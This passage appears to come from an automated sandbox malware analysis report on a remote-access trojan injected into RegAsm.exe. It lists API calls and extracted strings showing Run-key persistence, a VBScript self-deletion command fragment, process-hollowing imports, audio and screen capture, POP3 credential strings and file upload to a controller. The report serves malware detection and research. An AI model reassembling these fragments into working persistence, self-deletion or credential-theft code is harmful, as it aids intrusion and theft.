                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 4256916514-865373369
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                • API String ID: 1861856835-1447701601
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF$34
                                                                                • API String ID: 3797177996-4287197192
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,p54,00000003), ref: 004124CF
                                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                • lstrcatW.KERNEL32 ref: 0041263C
                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                • String ID: .exe$8SG$WDH$exepath$open$p54$temp_
                                                                                • API String ID: 2649220323-2651630017
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                • API String ID: 738084811-2094122233
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,34,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-255920310
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,p54,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32 ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32 ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32 ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open$p54$34
• API String ID: 1579085052-2460890452
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable
• String ID: xX4
• API String ID: 1464849758-4134912787
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 4218353326-3023110444
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32 ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32 ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32 ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
• RegEnumKeyExA.ADVAPI32 ref: 0041C786
• RegCloseKey.ADVAPI32(?), ref: 0041CA50
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
• GetCursorPos.USER32(?), ref: 0041D67A
• SetForegroundWindow.USER32(?), ref: 0041D683
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
• Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
• ExitProcess.KERNEL32 ref: 0041D6F6
• CreatePopupMenu.USER32 ref: 0041D6FC
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
APIs
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
• CloseHandle.KERNEL32(00000000), ref: 00408FE9
• CloseHandle.KERNEL32(00000000), ref: 00409037
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
• API String ID: 3086580692-2582957567
APIs
• ___free_lconv_mon.LIBCMT ref: 0045138A
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
• _free.LIBCMT ref: 0045137F
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 004513A1
                                                                                • _free.LIBCMT ref: 004513B6
                                                                                • _free.LIBCMT ref: 004513C1
                                                                                • _free.LIBCMT ref: 004513E3
                                                                                • _free.LIBCMT ref: 004513F6
                                                                                • _free.LIBCMT ref: 00451404
                                                                                • _free.LIBCMT ref: 0045140F
                                                                                • _free.LIBCMT ref: 00451447
                                                                                • _free.LIBCMT ref: 0045144E
                                                                                • _free.LIBCMT ref: 0045146B
                                                                                • _free.LIBCMT ref: 00451483
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                • _free.LIBCMT ref: 10007D32
                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                • _free.LIBCMT ref: 10007D72
                                                                                • _free.LIBCMT ref: 10007D80
                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
